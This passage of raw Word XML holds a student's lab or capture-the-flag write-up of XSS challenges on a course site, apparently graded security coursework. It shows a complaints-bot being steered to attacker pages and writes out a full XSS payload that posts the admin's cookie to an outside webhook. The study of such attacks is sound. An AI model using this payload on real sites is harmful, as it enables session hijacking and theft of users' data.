                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="11625966" w14:textId="455A8FF2" w:rsidR="00D352DC" w:rsidRDefault="00D352DC" w:rsidP="00D352DC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Now I need to find a way to exploit it to open another </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>users</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> session</w:t>
            </w:r>
            <w:r w:rsidR="00A944EC">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0454CF40" w14:textId="00032C32" w:rsidR="00A944EC" w:rsidRDefault="00A944EC" w:rsidP="00A944EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>I first validated that by entering a complaint the bot goes to the page it is sent to. By putting a webhook on my blog redirection on my blog and observing the bot accessing the webhook.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F17A4B" w14:textId="2E372859" w:rsidR="00A944EC" w:rsidRDefault="00CF0BDD" w:rsidP="00CF0BDD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF0BDD">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1513A1C5" wp14:editId="31F89B97">
                  <wp:extent cx="3728394" cy="1758240"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                  <wp:docPr id="43621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10691" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3748168" cy="1767565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B9D206" w14:textId="77777777" w:rsidR="00CF0BDD" w:rsidRDefault="00CF0BDD" w:rsidP="00CF0BDD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="1440"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="489D5B08" w14:textId="7D5280BF" w:rsidR="00A944EC" w:rsidRDefault="00A944EC" w:rsidP="00A944EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">I first checked the cookies that the page </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>stores</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> but they are http only so any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> I put in will not have access to them. Hence, the cookie path </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>is much harder.</w:t>
            </w:r>
            <w:r w:rsidR="009701CD" w:rsidRPr="00A944EC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009701CD" w:rsidRPr="00A944EC">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="529A0C1B" wp14:editId="7ACF49E3">
                  <wp:extent cx="5943600" cy="359410"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="148457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78003" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="359410"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="095C7CF8" w14:textId="688A3729" w:rsidR="009701CD" w:rsidRDefault="009701CD" w:rsidP="00A944EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">I then decided to try to setup so that my blog will redirect the bot to give a privileged page using JS since I already proved I could inject </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and redirect a bot to anywhere so I tried to see if I could get it to actually send me the data</w:t>
            </w:r>
            <w:r w:rsidR="004C21FE">
              <w:t>, hence I hosted a webhook.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Turns </w:t>
            </w:r>
            <w:r w:rsidR="004C21FE">
              <w:t>out I was able to retrieve the flag however I believe somebody may have made the flags public.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CCB0800" w14:textId="6AA8DB54" w:rsidR="004C21FE" w:rsidRDefault="004C21FE" w:rsidP="00A944EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Still for testing purposes I submitted the link to the admin which returned the same data to my webhook.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4644ACC7" w14:textId="083E2A53" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="00672D39">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r w:rsidRPr="00672D39">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53EA6DA5" wp14:editId="637D3552">
                  <wp:extent cx="5943600" cy="3345180"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="87657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79967" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="3345180"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D21BAF" w14:textId="58BE54CC" w:rsidR="009701CD" w:rsidRDefault="009701CD" w:rsidP="009701CD">
            <w:r w:rsidRPr="009701CD">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7780DB9D" wp14:editId="46EA7A2E">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>815769</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>2540</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4985385" cy="2704465"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="635"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="1709814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85385" cy="2704465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="78AA1634" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="58E1F264" w14:textId="77777777" w:rsidR="009701CD" w:rsidRDefault="009701CD" w:rsidP="009701CD"/>
          <w:p w14:paraId="68B241D9" w14:textId="4ABD3C47" w:rsidR="009701CD" w:rsidRDefault="009701CD" w:rsidP="009701CD"/>
          <w:p w14:paraId="07A3D7D4" w14:textId="098AED4F" w:rsidR="009701CD" w:rsidRDefault="009701CD" w:rsidP="009701CD"/>
          <w:p w14:paraId="7093302B" w14:textId="77777777" w:rsidR="009701CD" w:rsidRDefault="009701CD" w:rsidP="009701CD"/>
          <w:p w14:paraId="49BF8571" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="672A3E0B" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="0A947963" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="40730329" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="001D0371" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="1B8D2F19" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="4EF9579B" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="50EFA471" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="38508172" w14:textId="77777777" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD"/>
          <w:p w14:paraId="4947C94A" w14:textId="74A05DFA" w:rsidR="00672D39" w:rsidRDefault="00672D39" w:rsidP="009701CD">
            <w:r w:rsidRPr="00672D39">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47422A4B" wp14:editId="505D5D6E">
                  <wp:extent cx="5943600" cy="2816860"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="522335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5574" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2816860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="530FE056" w14:textId="588AF5F6" w:rsidR="009701CD" w:rsidRDefault="005C2FF5" w:rsidP="009701CD">
            <w:r>
              <w:t xml:space="preserve">Server Got Updated as that log prior was somebody making keys public, I also had to use another webhook because I had sent too many requests resulting in DOS, Hence is another demo, which shows it working I made Bobb and Alice, Bobb has a top secret hidden and Alice puts an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Xss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> injection the same as before, Alice cannot see </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bobbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> hidden messages but when </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>alice</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> complains she can see in the webhook the returned html which contains Bobbs Secrets!:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EACD3FD" w14:textId="1BFAB738" w:rsidR="005C2FF5" w:rsidRDefault="005C2FF5" w:rsidP="009701CD">
            <w:r w:rsidRPr="005C2FF5">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C53A074" wp14:editId="2F3F7C6D">
                  <wp:extent cx="5943600" cy="2352040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="99609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93417" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2352040"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B4601E" w14:textId="2D9F552A" w:rsidR="005C2FF5" w:rsidRDefault="00EF729C" w:rsidP="009701CD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Now I needed to go back and find the flag. I wanted to give the cookie another </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>try</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00304EF9">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00304EF9">
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00304EF9">
              <w:t xml:space="preserve"> I tried sending it from the admin side to see what I </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00304EF9">
              <w:t>get</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00304EF9">
              <w:t xml:space="preserve"> and to decode it normally:</w:t>
            </w:r>
            <w:r w:rsidR="00304EF9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00304EF9" w:rsidRPr="00304EF9">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0555AAE3" wp14:editId="42897020">
                  <wp:extent cx="5943600" cy="2896870"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="139103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33859" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2896870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C84170" w14:textId="64EEFE26" w:rsidR="00EF729C" w:rsidRDefault="00EF729C" w:rsidP="009701CD">
            <w:r w:rsidRPr="00EF729C">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F98EAD2" wp14:editId="68754D28">
                  <wp:extent cx="5943600" cy="2259330"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="55564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41704" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2259330"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="51FE37C4" w14:textId="31551646" w:rsidR="004B44E2" w:rsidRDefault="004B44E2" w:rsidP="008B2D31">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:r w:rsidRPr="004B44E2">
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28445113" wp14:editId="38AD9643">
                  <wp:extent cx="5397500" cy="2053472"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:docPr id="173316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61163" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5403860" cy="2055892"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C54EE84" w14:textId="588DC653" w:rsidR="6E9B7AC1" w:rsidRDefault="008B2D31" w:rsidP="008B2D31">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:r>
              <w:t>XSS 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="339229EF" w14:textId="323B4AFD" w:rsidR="6E9B7AC1" w:rsidRDefault="001811B8" w:rsidP="6E9B7AC1">
            <w:r>
              <w:t xml:space="preserve">Initially I thought </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>to try</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the search functionality as there is a new user input. I first tried html injection with a bolding </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tag</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and it worked:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE5D39B" w14:textId="47A33EA7" w:rsidR="001811B8" w:rsidRDefault="001811B8" w:rsidP="6E9B7AC1">
            <w:r w:rsidRPr="001811B8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CA76F32" wp14:editId="1E61CBE6">
                  <wp:extent cx="5943600" cy="1364615"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="11332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9267" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1364615"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DC74CE" w14:textId="77777777" w:rsidR="00E06A01" w:rsidRDefault="00E06A01" w:rsidP="6E9B7AC1">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">I then found that </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>with</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> using the script I could log to the console the number 1, hence this was an injection point.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76698FB1" w14:textId="50FE882E" w:rsidR="00E06A01" w:rsidRDefault="00E06A01" w:rsidP="6E9B7AC1">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E06A01">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBB3EAD" wp14:editId="5D605740">
                  <wp:extent cx="5943600" cy="1107440"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11532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81614" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1107440"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEB0938" w14:textId="01982B17" w:rsidR="6E9B7AC1" w:rsidRDefault="002A6D6F" w:rsidP="002A6D6F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What I decided to do is then from the vulnerability of the input I decided to put a script in the search bar. And then have it </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>exectute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and fail. But then I get the complaints bot to visit it from the query being in the URL. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> I gave this input:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C26B23" w14:textId="788B6BA5" w:rsidR="002A6D6F" w:rsidRDefault="002A6D6F" w:rsidP="002A6D6F">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r w:rsidRPr="00660C19">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://xss2.comp6841.xyz/search?q=%3Cscript%3Efetch%28%27https%3A%2F%2Fhkdk.events%2F6j8hbch8dxbs8m%27%2C+%7Bmethod%3A+%27POST%27%2C+body%3A+encodeURIComponent%28document.cookie%29%7D%29%3C%2Fscript%3E</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4C214528" w14:textId="05DA3A91" w:rsidR="002A6D6F" w:rsidRDefault="002A6D6F" w:rsidP="002A6D6F">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A7D5E87" w14:textId="015C635A" w:rsidR="002A6D6F" w:rsidRDefault="002A6D6F" w:rsidP="002A6D6F">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:t>Which is this script command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C6E3C99" w14:textId="0C92222C" w:rsidR="002A6D6F" w:rsidRDefault="002A6D6F" w:rsidP="002A6D6F">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>fetch(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>'https://hkdk.events/6j8hbch8dxbs8m</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>', {</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t xml:space="preserve">method: 'POST', body: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>encodeURIComponent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>)</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>})&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A6D6F">
              <w:t>/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED44921" w14:textId="1EE44D2D" w:rsidR="002A6D6F" w:rsidRDefault="002A6D6F" w:rsidP="002A6D6F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hence this would send the cookie of the admin over to the webhook server which is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>great !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="14AEB73E" w14:textId="7C3E4301" w:rsidR="007B4EEE" w:rsidRDefault="007B4EEE" w:rsidP="007B4EEE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <w:r w:rsidRPr="007B4EEE">
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9D710D" wp14:editId="6206EAF1">
                  <wp:extent cx="5943600" cy="2501265"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="184701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7703" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2501265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="11261163" w14:textId="0ECF14F0" w:rsidR="008B2D31" w:rsidRDefault="008B2D31" w:rsidP="008B2D31">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:r>
              <w:t>XSS 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5451961C" w14:textId="1B14990F" w:rsidR="6E9B7AC1" w:rsidRDefault="00692191" w:rsidP="00692191">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>From an inspection of our user input management</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0E90F2" w14:textId="7301487A" w:rsidR="00692191" w:rsidRDefault="00692191" w:rsidP="00692191">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">We Get open access to the link field in the image. We can then escape this constraint and now control </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>similar to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
